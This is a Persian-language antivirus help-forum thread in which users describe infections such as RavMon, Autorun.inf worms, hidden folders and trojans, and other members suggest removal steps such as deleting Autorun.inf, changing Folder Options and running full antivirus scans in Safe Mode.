با عرض خسته نباشید خدمت همه دوستان ویروس کش و خصوصا مدیر انجمن آنتی ویروس من بعد از کلی جستجو در اینترنت و مخصوصا" سایت شما این تاپیک را پیدا کردم ولی با حدود 90 صفحه بحث تقریبا" مشابه روبرو شدم و با اینکه جوابهای شما ویروس شکن بود اما در هر چند صفحه تکراری می شد . بنده پیشنهاد مکنم با دسته بندی این بحثها و به موازات آن جوابهای شما باعث دسترسی سریعتر دوستان و سردرگم نشدن آنها در این صفحه ها میشود.
من نیز مثل خیلی از دوستان مشکل شو نشدن فایلها را دارم اما با مراجعه به این تاپیک راه حلهای زیادی را پیدا کردم که باید انهارا امتحان نمایم ضمنا" من کاسپر ابدیت شده را نصب کردم و این ویروس را از بین بردم و الان فقط مشکل ران نشدن فایلهای exe , شو نشدن فایلها را دارم که فکر می کنم با اجرای این راه حلها این مشکم حل شود
موفق باشید و با موفقیت ادامه بدهید ..................................Amir

با سلام دوباره من بعد از 3 ساعت تقریبا" تمام مشکلاتم با کامپیوترم حل شد به جز از همه مهمتر که ران شدن فایلهای exe میباشد. لطفا" در این مورد بیشتر کمکم کنید..............................َAmir

با سلام دوباره من بعد از 3 ساعت تقریبا" تمام مشکلاتم با کامپیوترم حل شد به جز از همه مهمتر که ران شدن فایلهای exe میباشد. لطفا" در این مورد بیشتر کمکم کنید..............................َAmir

سلام

منظورتان از فایلهای exe برنامه های اجرایی موجود در سیستمتان است یا فایلهایی که پس از ابتلا به ویروس پسوند exe

پیدا کرده اند ؟

این ویروسی است که کامپیوتر من گرفته
میشه یه آنتی ویروس خوب راهنمایی کنید
RovMon.exe با ویروس کش nod32 امتحان کردم نشد
یعنی ویروس رو میشناسه ولی گزینه پاک کردنش فعال نمی شه
مشکل از ویروس کش من است یا این ویروس کش ضعیف است لطفا راهنمایی کنید
ممنون

سلام مجدد ببخشید اسمش هست RavMon
ممنون

سلام

ببخشید این ارور در ویندوز امکانش هست که مربوط به وبروس باشه.یکی از درایو های هاردم باز نمیشه. در ضمن سیستمم هم خیلی کند شده. در ویستا بدونه مشکل اون درایو باز میشه.

واقعیت با دو گیگ و نیم رم نباید سیستم اینقدر کند بشه!!

این ارور:

E:\ is not accessible.

the file or directory is corrupted and unreadable.



لطفا نظرتون؟

من دو ویندوز دارم
یکی ویستا و یکی ایکس

برنامه های امنیتی من در دو ویندوز:

Xp:آنتی ویروس کسپرسکی-اسپای سویپر-زون آلارم فایروال
Vista:اینترنت سکوریتی کسپرسکی-اسپای ور داکتر

این ویروسی است که کامپیوتر من گرفته
میشه یه آنتی ویروس خوب راهنمایی کنید
RovMon.exe با ویروس کش nod32 امتحان کردم نشد
یعنی ویروس رو میشناسه ولی گزینه پاک کردنش فعال نمی شه
مشکل از ویروس کش من است یا این ویروس کش ضعیف است لطفا راهنمایی کنید
ممنون

شما تنظیمات مریوط به ناد32 رو که در تایپک جداگانه مو به مو توضیح داده شده رو بر روی آنتی ویروس خودتون امتحان

کنید و بعد از تنظیمات یک با سیستم خودتون رو فول اسکن کنید مشکلتون حل میشه.

در ضمن این پروسه ای که شما نام بردید مربوط میشه به یک آنتی ویروس هندی به نام Rising Antivirus آیا شما از آنتی ویروس دیگه ای استفاده

میکنید؟

البته یک Worm هم وجود داره که با همین نام این فایل رو در سیستم ایجاد میکنه تا طرف فکر کنه ماله آنتی ویروسشه.

اما شما کار بالا رو که بهتون گفتم انجام بدید مشکل برطرف میشه.

سلام دوستان

یکی از دوستانم بهم گفت:


سلام
آقا بدبخت شدیم رفت دیروز یه ویروس نمیدونم از کجا اومده بود به اسم virus Hidvg.A که اعصاب ما رو بد جور بهم ریخت
کل فایلهای EXE رو خراب کرد وخوب انتی ویروس هم همه رو پاک کرده حالا بگین چی کار کنم نمیشه کاری کرد که
ویروس از فایلهای EXE پاک بشه وخود فایل EXE سالم دربیاد حدود 1 گیگ رو پاک کرده این انتی ویروس واسه همین
انتی ویروس رو پاک کردم که باقی فایلهای EXE پاک نشه(یه پیشنهاد به دوستان هر چی فایل EXE دازین به RAR تبدیل کنید ) میخوام فایل های EXE رو سالم کنم چی کار کنم ؟ و ویروس رو از فایلهای EXE پاک کنم


بیچاره چه کار کنه؟

سلام دوست من

این سیستم دچار یک Adware شده است که پیغامهای امنیتی کاذب به شما می دهد و شما را تشویق می کند تا ا

این برنامه را داونلود ونصب کنید .علت به وجود آمدن این مشکل هم عدم وجود یک آنتی اسپایور درست و حسابی

روی سیستم است .در هر حالت شما می توانید دو کار بکنید :یا سوپر آنتی اسپایور یا AVG را داونلود و نصب کرده و

پس از آپدیت سیستمتان را با آنها اسکن کنید تا شما را از شر این مشکل خلاص کنند یا برنامه مخصوص این اسپایور

را نصب و اجرا کنید .راه اول یعنی نصب آنتی اسپایور بهتر است چون بعد از این هم به دردتان می خورد ولی اگر راه

دوم را خواستید بگویید تا لینک و طرز کار برنامه اختصاصی را برایتان بنویسم.



واسه منم همین علامت میاد jeefocli.com ;l;d k;vn

با سلام - میخواستم بگم که تو همه پوشه هام یه new folder باز میشه - اسمه فایلم mahsa هستش از نسخه 1 . ممنون میشم اگه منو راهنمایی کنید.

با mcafee هم اسکن کردم همشو پیدا کرد ولی نمیتونست پاکشون کنه.

سلام کمی اطلاعات راجع به هوش مصنوعی آنتی ویروس ها ون حوه عملکردشان می خوام

سلام

منظورتان از فایلهای exe برنامه های اجرایی موجود در سیستمتان است یا فایلهایی که پس از ابتلا به ویروس پسوند exe

پیدا کرده اند ؟

با سلام منظور من تمام ایکونهای روی دسکتاپ و کنترل پنل و تمام فایلهای اجرایی است .
درصورت کلیک روی این فایلها پنجره openwith باز میشد.اما الان مشکلم حل شد در قسمت پایین همین پنجره یک گزینه برای هلپ ماکروسافت است که از طریق ان به قسمتی راهنمایی میشوید که تغییرات بوجود امده درریجستری توضیح داده شده و بسته های اصلاحی ان نیز وجود دارد که من با گرفتن و اجرا انها مشکلم حل شد .
موفق باشید.....................................Ami r

با سلام - میخواستم بگم که تو همه پوشه هام یه new folder باز میشه - اسمه فایلم mahsa هستش از نسخه 1 . ممنون میشم اگه منو راهنمایی کنید.

دوست عزیز

کمی جستجو چیز بدی نیست :46: سری به لینک زیر بزنید :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام کمی اطلاعات راجع به هوش مصنوعی آنتی ویروس ها ون حوه عملکردشان می خوام


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نمی دونم سیستمم به چه ویروسی آلوده شده ولی
کل اطلاعات هاردم رو نشون نمی ده
و اصلا ویندوز بالا نمی یاد
وقتی هم با سی دی ویندوز بالا می یام که ویندوز رو عوض کنم وقتی به انتخاب درایو برای نصب ویندوز می رسه می گه هیچ درایو ندارین و همه فضا رو به صورت استفاده نشده نشون می ده
وقتی هم که می خوام تو اون فضا درایو درس کنم ، این کار رو انجام نمی ده
من نمی دونم چکارش کنم(مهم نیس اگه اطلاعات پاک شه فقط سیستم بالا بیاد کافیه)
لطفا راهنمایی کنید

راه حلی که به ذهن من رسید:
هارد سیستم رو به یه سیستم دیگه وصل می کنیم و بعد فرمت می کنیم و یا اگه شد اطلاعات رو برمی داریم
عملیه؟؟؟

یه سی دی بوت البل 98 پیدا کن و یه بار chek disk کن بعد از چک کردن از طریق fdisk هارد رو پاک و از نوع پارتیشن بندی کن .(بدونه اطلاعات و اموزش کافی این کارا رو انجام ندهید بهتره بری اول اموزش هاشو که تو سایت 100%هست ببینی بعد اقدام کنی)

یه سی دی بوت البل 98 پیدا کن و یه بار chek disk کن بعد از چک کردن از طریق fdisk هارد رو پاک و از نوع پارتیشن بندی کن .(بدونه اطلاعات و اموزش کافی این کارا رو انجام ندهید بهتره بری اول اموزش هاشو که تو سایت 100%هست ببینی بعد اقدام کنی)
بابا این کارا رو که بلدم خودم ، ولی به ذهنم نرسید انجام بدم
خیلی ممنون
روشی که خودم گفتم چی،عملیه(هارد به هارد کردن آسون تر از پیدا کردن بوت 98):31:

سلام به همه دوستان عزیز
سیستم من چند روز پیش یه ویروس واقعا .......گرفت بعد از اینکه متوجه شدم سیستمم ویروس گرفته تو پنجره task manager پروسس های در حال اجرامو چک کردم که به یه مورد مشکوک برخوردم یه پروسس با نامsvchost.exe داخل پوشه C:\WINDOWS وبه نام کاربری خودم در حال اجرا بود اونو بستم و انتی ویروس Kaspersky Internet Security 7.0 رو نصب وبا اون سیستم رو چک کردم Kaspersky داخل هر درایو دو فایل با نامهای REVMON.EXE و Autorun.inf وداخل پوشه C:\WINDOWS یه فایل با نام mdm.exe پیدا کرد و اونهارو به عنوان تروجان بهم معرفی و پاکشون کرد بعد از اون ویندوز رو عوض کردم خلا صه دیگه ندیدم اون پروسس مشکوک اجرا بشه ولی هر بار که روی یکی از درایوهام راست کلیک می کنم با عکس شماره 1 برخورد می کنم درایوcوdرو فرمت کردم خوب شدن ولی درایو e و jهنوز به همون صورت هستن اخه نرم افزارها و برنامه های خیلی با ارزشم داخل این دو درایو هستند به همین خاطر نمی تونم فرمتشون کنم اگر کسی راه حلی واسه این مشکل داره ممنون می شم کمکم کنه راستی تا یادم نرفته بگم بعد از ویروس زدایی دیگه Kaspersky داخل درایوهام فایلی با نام REVMON.EXE پیدا نمی کنه ولی فایل Autorun.inf رو پیدا واسکنش می کنه ولی این دفعه اونو به عنوان یه تروجان شناساییش نمی کنه ممنون می شم کمکم کنید

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

عکس شماره 2مربوط به همون تروجان می شه که انتی ویروس داخل مموری گوشیم پیداش کرد

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام به همه دوستان عزیز
سیستم من چند روز پیش یه ویروس واقعا .......گرفت بعد از اینکه متوجه شدم سیستمم ویروس گرفته تو پنجره task manager پروسس های در حال اجرامو چک کردم که به یه مورد مشکوک برخوردم یه پروسس با نامsvchost.exe داخل پوشه C:\WINDOWS وبه نام کاربری خودم در حال اجرا بود اونو بستم و انتی ویروس Kaspersky Internet Security 7.0 رو نصب وبا اون سیستم رو چک کردم Kaspersky داخل هر درایو دو فایل با نامهای REVMON.EXE و Autorun.inf وداخل پوشه C:\WINDOWS یه فایل با نام mdm.exe پیدا کرد و اونهارو به عنوان تروجان بهم معرفی و پاکشون کرد بعد از اون ویندوز رو عوض کردم خلا صه دیگه ندیدم اون پروسس مشکوک اجرا بشه ولی هر بار که روی یکی از درایوهام راست کلیک می کنم با عکس شماره 1 برخورد می کنم درایوcوdرو فرمت کردم خوب شدن ولی درایو e و jهنوز به همون صورت هستن اخه نرم افزارها و برنامه های خیلی با ارزشم داخل این دو درایو هستند به همین خاطر نمی تونم فرمتشون کنم اگر کسی راه حلی واسه این مشکل داره ممنون می شم کمکم کنه راستی تا یادم نرفته بگم بعد از ویروس زدایی دیگه Kaspersky داخل درایوهام فایلی با نام REVMON.EXE پیدا نمی کنه ولی فایل Autorun.inf رو پیدا واسکنش می کنه ولی این دفعه اونو به عنوان یه تروجان شناساییش نمی کنه ممنون می شم کمکم کنید

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

عکس شماره 2مربوط به همون تروجان می شه که انتی ویروس داخل مموری گوشیم پیداش کرد

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



دوست عزیز

در هر کدام از درایوهایی که این مشکل را دارند یک فایل مخفی به نام Autorun.inf پیدا می کنی آن را پاک کن تا مشکلت

حل شود.

عزیزان چرا کاسپر تروجان small trojanرو نشناخت؟

اقا سیستم ما هک شده یه نفر یه تروجان واسه ما فرستاد ما هم از رو کنجکاوی کلیک کردیم روش, بقیه داستان رو دیگه میتونین حدس بزنین.
الان مشکل اینه که هیچ فولدری رو نمیتونم باز کنم و فایلها رو اجرا کنم این آدم عقده ای تو فایل text این نوشته رو گذاشته:
salam man persian jaguar hastam goftam ke ........ age faile baze konnande ye kampioteret ro mikhay be man email bezan .
در صورتی که ایمیلشو هم نگذاشته.
اگه کسی میتونه بگه ما چیکار کنیموگرنه که دیگه باید 78 گیگ فیلم و عکس و آهنگ تولز که همه به روز هستن رو دیلیت کنم غیر از اون باید 60 هزار تومن هاردو بسوزونم بندازم تو سطل زباله.
با تشکر قبلی ازراهنمایی شما

عزیزان چرا کاسپر تروجان small trojanرو نشناخت؟

به اين لينك برويد.در DataBase كاسپر وجود داره و اين تروجان توسط كاسپر قابل شناسايي هست:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دوست عزیز

در هر کدام از درایوهایی که این مشکل را دارند یک فایل مخفی به نام Autorun.inf پیدا می کنی آن را پاک کن تا مشکلت

حل شود.


سلام اون فایلی که شما گفتین خودم هم می دونم که هست ولی نمی دونم چه طوری پیداش کنم show hidden files and folders رو هم که می زنم همه فایلهای مخفیم رو می تونم ببینم ولی باز هم فایل Autorun.inf رو نمی تونم پیدا کنم اگر کسی راه حلش رو می دونه ممنون می شم کمکم کنه

سلام اون فایلی که شما گفتین خودم هم می دونم که هست ولی نمی دونم چه طوری پیداش کنم show hidden files and folders رو هم که می زنم همه فایلهای مخفیم رو می تونم ببینم ولی باز هم فایل Autorun.inf رو نمی تونم پیدا کنم اگر کسی راه حلش رو می دونه ممنون می شم کمکم کنه

در همان Folder Option تیک گزینه Hide Protected Operating System Files را بردار.

ممنون فکر کنم درست شد از همتون ممنونم که کمکم کردید به خصوص شما vtn54عزیز

دوستان یه مبحثی رو سرچ کردم اینجا و به موضوع مورد نظر در پست 295 رسیدم ادرسش اینه

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ولی برای بنده هم این مشکل بوجود اومده و وقتی کلیک راست میکنم روی درایو گزینه AutoPlay داره
این محتوای تاپیک من در انجمن کامپیوتره:
=====
دوستان سلام
فکر کنم مشکل از یک ویروسه و لی با اخرین نسخه و با آخرین اپدیت کاسپرسکی و با اخرین امنیتش(High) کامپیوتر رو 5 ساعت هم اسکن کردم 14 تا ویروس توش بود که در حالت امنیت معمولی پیداش نکرد ولی باز هم وقتی روی درایو هام در مای کامپیوتر دبل کلیک میکنم که واردشون بشم با پیغام زیر مواجه میشم البته اگر کلیک راست کنم و Open رو بزنم مشکلی نیست.
ممنون میشوم در این زمینه راهنمایی فرمایید
با تشکر
این هم عکس پیغام خطا
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
=====

دوستان یه مبحثی رو سرچ کردم اینجا و به موضوع مورد نظر در پست 295 رسیدم ادرسش اینه

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ولی برای بنده هم این مشکل بوجود اومده و وقتی کلیک راست میکنم روی درایو گزینه AutoPlay داره
این محتوای تاپیک من در انجمن کامپیوتره:
=====
دوستان سلام
فکر کنم مشکل از یک ویروسه و لی با اخرین نسخه و با آخرین اپدیت کاسپرسکی و با اخرین امنیتش(High) کامپیوتر رو 5 ساعت هم اسکن کردم 14 تا ویروس توش بود که در حالت امنیت معمولی پیداش نکرد ولی باز هم وقتی روی درایو هام در مای کامپیوتر دبل کلیک میکنم که واردشون بشم با پیغام زیر مواجه میشم البته اگر کلیک راست کنم و Open رو بزنم مشکلی نیست.
ممنون میشوم در این زمینه راهنمایی فرمایید
با تشکر
این هم عکس پیغام خطا
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
=====

دوست عزیز

در هر کدام از درایوهایی که این مشکل را دارند یک فایل مخفی به نام Autorun.inf پیدا می کنی آن را پاک کن تا

مشکلت حل شود.یا خیلی ساده تر برنامه کم حجم زیر را داونلود و اجرا کن تا تمامی مشکلات مربوط به این ویروس را

از بین ببرد:

PRT (27 KB ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

دوست عزیز

در هر کدام از درایوهایی که این مشکل را دارند یک فایل مخفی به نام Autorun.inf پیدا می کنی آن را پاک کن تا

مشکلت حل شود.یا خیلی ساده تر برنامه کم حجم زیر را داونلود و اجرا کن تا تمامی مشکلات مربوط به این ویروس را

از بین ببرد:

PRT (27 KB ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

vtn54 جان خیلی لطف کردید ممنون
درست شد اتوران رو دیلیت کردم اولش درست نشد ولی بعد که ریست کردم ویندوزم نمیومد بالا ولی از طریق سی دی بوت درستش کردم و ویندوز درست شد
با تشکر :11:

به اين لينك برويد.در DataBase كاسپر وجود داره و اين تروجان توسط كاسپر قابل شناسايي هست:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
سلام پس چرا وقتیAVGرو نصب کردم این تروجان رو تشخیص داد ولی کاسپر دم بریده چیزی نگفت؟

سلام پس چرا وقتیAVGرو نصب کردم این تروجان رو تشخیص داد ولی کاسپر دم بریده چیزی نگفت؟

دوست عزیز هیچ آنتی ویروسی نمیتونه 100 درصد Malware ها رو تشخیص بده. اما چون این تروجان در دیتابیس کسپرسکی

وجود داره اونوقت این احتمال رو میدم که تنظیمات آنتی ویروس شما بر روی حالت معمولی قرار داره.

با سلام ، :31:
یه چند روزه یه ویروس لعنتی ( به نام : VBS/TrojanDropper.Small.W trojan ) یا این طور که از اسمش پیداست تروجان ، فایل های HTML رو مورد حمله قرار داده . آنتی ویروس من NOD 32 هست و یه 2 هفته پیش آپدیت کردم . Nod این ویروس ( یا تروجان ) رو پیدا می کنه ولی Clean نمی تونه بکنه . البته فایل های HTML جدید ( منظورم فایل هایی که تازه ذخیره کردم ) رو چک کردم مشکلی نداشت . راستی Zone Alarm هم دارم .
لطفا کمکم کنید . چیکار کنم ؟
ببخشید یه کم طولانی شد , با تشکر :10::40::11:

برو به تایپک بهترین تنظیمات برای آنتی ویورس ناد32 و تنظیماتی رو که اونجا پیشنهاد شده رو بر روی آنتی ویروستون

پیاده کنید. بعد سیستمتون رو باهش فول اسکن کنید.

ناد32 توی پاک کردن فایل های آلوده حتی اونهایی که در حافظه نشستن خیلی قویه و یکی از بهترین آنتی ویروسهاست.

من خودم با خیلی از آنتی ویروسها کار کردم اما توی پاک کردن ویروسه و تروجانها این 3 آنتی ویروس زیر بهترین آنتی

ویروس ها بودند.

NOD32

Kaspersky

BitDefender

در ضمن شما گفتید نمیتونه Clean کنه. درسته...؟ آیا شما مظمئن هستنید که اون فایلی که ویروسی شده قابل

تمیز کردن هست یا نه؟ اگر مطمئن هستید میشه توضیحاتتون رو در این زمینه بگید تا من هم قانع بشم.

اما اگر منظور شما از Clean همان Delete کردن است که بحث یک چیز دیگه است اما اگر منظورتون همون Clean

هست باید بگم که بعضی از ویروسها وقتی فایلی رو ناقص میکنند دیگه اون فایل توسط هیچ آنتی ویروسی

قابل پاکسازی نیست.

در ضمن اون فایل Html احتمالا خودش به این تروجان آلوده بوده چونکه تروجانها قابل تکثیر شدن نیستند. یعنی

نمیتونند فایل ها رو مورد حمله قرار بدن و یا احتمالا سیستم شما ویروسی شده و اون ویروسه که کدهای آلوده به

تروجان رو در فایل های HTML وارد میکنه.

بهر حال کاری رو که گفتم انجام بدید. اما قبل از اسکن کل سیستم حتما آنتی ویروستون رو هم آپدیت کنید.

يه ويروس رو مموري کارتم افتاده
وقتي مموري کارت رو به کارت ريدر ميزنم اين پيغام رو ميده


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اصلا نميزاره فرمتش کنم.با گوشي هم فرمت نميشه.آنتي ويروس ويروس رو ميشناسه ولي نمي تونه پاک کنه.
هم مک آفي و هم کاسپر.

اينم فايل هاي توي مموري که بعضي ها سوپر هيدن شدن


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام Persian.Boy جان , ممنون از راهنماییت .
منظورم از Clean همون Clean هست , راستی نه اون فایلای HTML از اول این رو نداشتن . مطمئنم .
بازم ممنون :31:

سلام دوستان
این ویروسی که حجم پوشه ها رو مخفی می کند و سپس پوشه را مخفی می کند با آنتی ویروش node 32 دوستم ویروس رو از بین برده ولی حالا مشکلی که داره اینه که پوشه هاش هنوز مخفی است و میگه
وقتی روی پوشه کلیک راست می کنم گزینه hiden رو نمیتونم تیکش رو بردارم و به همین خاطر پوشه هایش مخفی است
حالا چیکار کند که دائمی بتونه پوشه ها رو از حالت مخفی در بیارد
ممنون

سلام دوستان
این ویروسی که حجم پوشه ها رو مخفی می کند و سپس پوشه را مخفی می کند با آنتی ویروش node 32 دوستم ویروس رو از بین برده ولی حالا مشکلی که داره اینه که پوشه هاش هنوز مخفی است و میگه
وقتی روی پوشه کلیک راست می کنم گزینه hiden رو نمیتونم تیکش رو بردارم و به همین خاطر پوشه هایش مخفی است
حالا چیکار کند که دائمی بتونه پوشه ها رو از حالت مخفی در بیارد
ممنون

2 صفحه قبل رو بخون مشکل حل میشه.

سلام دوستان کسی می دونه اینرو چه جوری میشه از بین برد؟
اسمش :w32.myzor.rk@yf
و عکسی که گرفتم واسه پیغامش هست...
راستش یک برنامه کوچک رو از اینترنت گرفتم و بعد این جوری شد
لطفا هر کسی می تونه راهنماییم کنه.

عکس الصاقی به علت حجم بالا و اندازه غیرمعمول حذف شد .لطفا یا اندازه و حجم عکس را پایین بیاورید یا فقط لینک آن را بگذارید.


vtn54

دوست عزیز این پیغام به خاطر اینه که وارد یک سایت تبلیغاتی شدید واین پیغام رو این سایت بصورت ترفند برای هر کسی که وارد این سایت بشه نشون میده و شما با Ok کردن برروی پیغام به یک سایت برای دانلود نرم افزارهای امنیتی منتقل می شوید .
البته اینجور سایت ها ممکن با ورود به اونها Adware روی سیستمتون نصب کنند پس با یک آنتی اسپایور حتما سیستمتونو چک کنید.
در ضمن اگه میتونی سایز عکستو کوچک کن صفحه رو بهم ریخته!!!

منم می خوام ولی دکمه ویرایش نیست که....

راهشو پیدا کردم
اینجا

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

هيچکس نميدونه اين ويروسي رو که گفتم چطورميشه پاک کرد

هيچکس نميدونه اين ويروسي رو که گفتم چطورميشه پاک کرد

عکسها قابل مشاهده نیست.

عکسها قابل مشاهده نیست.

من دوباره چک کردم.هيچ مشکلي تو نمايش عکي نيست.

من دوباره چک کردم.هيچ مشکلي تو نمايش عکي نيست.

سلام

این برنامه را داونلود و اجرا کن و بعد با آنتی ویروس یک بار دیگر سیستم را اسکن و هر چه را پیدا کرد پاک کن ویروس تنها

روی مموری کارت نیست باز اگر مشکلی بود ما در خدمتیم:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام
سیستم منم یه ویروس داره از نود 32 استفاده کردم نشده و سرعت رو فجیع کاهش می ده
در ضمن یه چیز دیگه هم هست که داخل هر فولدری که می رم به همون اسم یه فولدر دیگه درست میشه
وقتی هم که روی درایوها راست کلیک می کنم یه نوشته های عجیب غریب میاد
لطفا راهنمایی کنید باید چیکار کنم
ممنون

سلام.
لطفا زودتر کمک کنید.من یک ویروس گرفتم (شاید ویروسه) که رو هر فایل exe یا هر نرم افزاری کلیک می کنم یک فایل نوتپد با نوشته های عجیب و غریب میاد که واسه هر نرم افزاری یه جوره.کمک کنید.چون نرم افزار پینت هم خرابه نمی تونم عکس بزارم.اگه چیز دیگه ای لازمه بگم بگید.لطفا زودتر.خیلی هول شدم.

سلام
سیستم منم یه ویروس داره از نود 32 استفاده کردم نشده و سرعت رو فجیع کاهش می ده
در ضمن یه چیز دیگه هم هست که داخل هر فولدری که می رم به همون اسم یه فولدر دیگه درست میشه
وقتی هم که روی درایوها راست کلیک می کنم یه نوشته های عجیب غریب میاد
لطفا راهنمایی کنید باید چیکار کنم
ممنون


سلام.
لطفا زودتر کمک کنید.من یک ویروس گرفتم (شاید ویروسه) که رو هر فایل exe یا هر نرم افزاری کلیک می کنم یک فایل نوتپد با نوشته های عجیب و غریب میاد که واسه هر نرم افزاری یه جوره.کمک کنید.چون نرم افزار پینت هم خرابه نمی تونم عکس بزارم.اگه چیز دیگه ای لازمه بگم بگید.لطفا زودتر.خیلی هول شدم.

آنتی ویروس کاسپرسکی را نصب و آپدیت کنید , System Restore ویندوز را غیر فعال کنید و در حالت Safe Mode

سیستم را به طور کامل با حداکثر تنظیمات اسکن کنید.

سلام.ممنون.ولی من هیچی حالیم نیست!آنتی ویروس الانم بیت دفندر است.کاسپر اسکی دااشتم ولی به همه چیز گیر می داد منم پاکش کردم.ببخشید هیچی نمی دونم لطفا بگید که :
1- چطور سیستم ریستور را غیر فعال کنم؟بعدن میشه فعالش کنم؟
2- safe mod چیه؟توضیح کامل لطفا.!!!!!!!!!!!
3- چطور ببرم رو حد اکثر تنظیمات؟
4- راه دیگری ندارد؟باید با کاسپر باشد ؟آخه به همه چی گیر میده!
5- منظورم را (از توضیحی که برای ویروس دادم) خوب متوجه شدید و فهمیدید ویروس هست یا نه و نوع ویروس را فهمیدی یا توضیحات بیشتری بدهم؟
لطفا زودتر.دارم می میرم.!!!!!

راستی الان آیکن آنتی ویروسم(بیت دفندر)همون مشکل براش پیش اومده و کار نمی کنه!فکر نکنم بعد نصب کاسپر کاسپر اجرا شود.راه دیگه ای نیست؟تو رو خدا زودتر .

سلام به همه دوستان
من یه ویروس گرفتم که مشخصاتش اینه:
آیکون اینترنت اکسپلورر تبدیل به آیکون فایل exe شده درضمن همه فایل های html اینطوری شدن
مثل خیلی از ویروس ها ، folder option پاک شده
اینم بگم که نورتون و nod32 نصب کردم آپدیت کردم نشناخت.
اگه ممکنه کمکم کنید.
ممنون

سلام به همه دوستان
من یه ویروس گرفتم که مشخصاتش اینه:
آیکون اینترنت اکسپلورر تبدیل به آیکون فایل exe شده درضمن همه فایل های html اینطوری شدن
مثل خیلی از ویروس ها ، folder option پاک شده
اینم بگم که نورتون و nod32 نصب کردم آپدیت کردم نشناخت.
اگه ممکنه کمکم کنید.
ممنون

CureIT با پشتیبانی از زبان فارسی.

اینو دانلود کن. بعد بزار اسکن کنه ببین مشکلت حل میشه یا نه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام.وقتی ویندوز بالا می یاد پیغامtemp.exe می اید وبعدهمه فولدرهاحجم65کیلوبایت رانشان میدهندوهرچی هست فقط میدانم تروجان مهسا کهnew Folder در داخل خودش میسازد نیست....کمک کنید

سلام.وقتی ویندوز بالا می یاد پیغامtemp.exe می اید وبعدهمه فولدرهاحجم65کیلوبایت رانشان میدهندوهرچی هست فقط میدانم تروجان مهسا کهnew Folder در داخل خودش میسازد نیست....کمک کنید

3/4 صفحه قبل رو بخونید.

سلام.
لطفا زودتر کمک کنید.من یک ویروس گرفتم (شاید ویروسه) که رو هر فایل exe یا هر نرم افزاری کلیک می کنم یک فایل نوتپد با نوشته های عجیب و غریب میاد که واسه هر نرم افزاری یه جوره.کمک کنید.چون نرم افزار پینت هم خرابه نمی تونم عکس بزارم.اگه چیز دیگه ای لازمه بگم بگید.لطفا زودتر.خیلی هول شدم.

آنتی ویروس کاسپرسکی را نصب و آپدیت کنید , System Restore ویندوز را غیر فعال کنید و در حالت Safe Mode
سیستم را به طور کامل با حداکثر تنظیمات اسکن کنید.

سلام.ممنون.ولی من هیچی حالیم نیست!آنتی ویروس الانم بیت دفندر است.کاسپر اسکی دااشتم ولی به همه چیز گیر می داد منم پاکش کردم.ببخشید هیچی نمی دونم لطفا بگید که :
1- چطور سیستم ریستور را غیر فعال کنم؟بعدن میشه فعالش کنم؟
2- safe mod چیه؟توضیح کامل لطفا.!!!!!!!!!!!
3- چطور ببرم رو حد اکثر تنظیمات؟
4- راه دیگری ندارد؟باید با کاسپر باشد ؟آخه به همه چی گیر میده!
5- منظورم را (از توضیحی که برای ویروس دادم) خوب متوجه شدید و فهمیدید ویروس هست یا نه و نوع ویروس را فهمیدی یا توضیحات بیشتری بدهم؟
لطفا زودتر.دارم می میرم.!!!!!

راستی الان آیکن آنتی ویروسم(بیت دفندر)همون مشکل براش پیش اومده و کار نمی کنه!فکر نکنم بعد نصب کاسپر کاسپر اجرا شود.راه دیگه ای نیست؟تو رو خدا زودتر .

جواب منم بدید.یه چیز دیگه هم کشف کردم!این ویروسم سرعت رو خیلی کم کرده(سرعت سیستم).
من قبلا به راحتی می تونستم فیلم یا کلیپ با کامپیوتر ببینم ولی الان که میرم کلیپ ببینم می بینم سرعت خیلی پایینه و از طریق task manager می بینم cpu usage شده 100 درصد ولی قبلا این طور نبود.
لطفا زودتر.
ویرایش جدید:
1- کامپیوتر را ریستارت کردم ولی حالا در حالت عادی که هیچ پنجره ای باز نیست سی پی یو یوزیج زیاد است و گاهی 100 درصد و گاهی هم 90 یا 80 و ... می شود!!!
2- این کاسپر اسکای نصب نشد!هیچ نرم افزاری نصب نمی شود با این حالت!!!
ویرایش:
بالاخره تونستم کاری کنم که براتون عکس بزارم.!
--------------------------------------------------------------------------------------------------------------------------------------------------
================================================== =======================
ویرایش:
برای این که گیج نشوید تمام اطلاعات را که تا به حال به دست آوردم این جا یک جا می گذارم!
اطلاعات من از این ویروس:
1- به احتمال زیاد این یک ویروس است!(یعنی من به کامپیوتر کخ نریختم که این طور شود ویروس این طورش کرده به احتمال زیاد)
2- رو هر فایل exe یا هر نرم افزاری کلیک می کنم یک فایل نوتپد با نوشته های عجیب و غریب میاد که واسه هر نرم افزاری یه جوره.نرم افزار پینت هم به دلیل این ویروس خرابه .
3- با این که پینت خرابه ولی عکس های قبلیمو با کلیک راست توسط پینت باز کردم و با پرینت اسکرین عکس گرفتم و تو صفحه پینت کپی کردم.بعد ذخیره کردم و بعد هم آپلود.
4- راستی الان آیکن آنتی ویروسم(بیت دفندر)همون مشکل براش پیش اومده و کار نمی کنه!
5- یه چیز دیگه هم کشف کردم!این ویروسم سرعت رو خیلی کم کرده(سرعت سیستم).
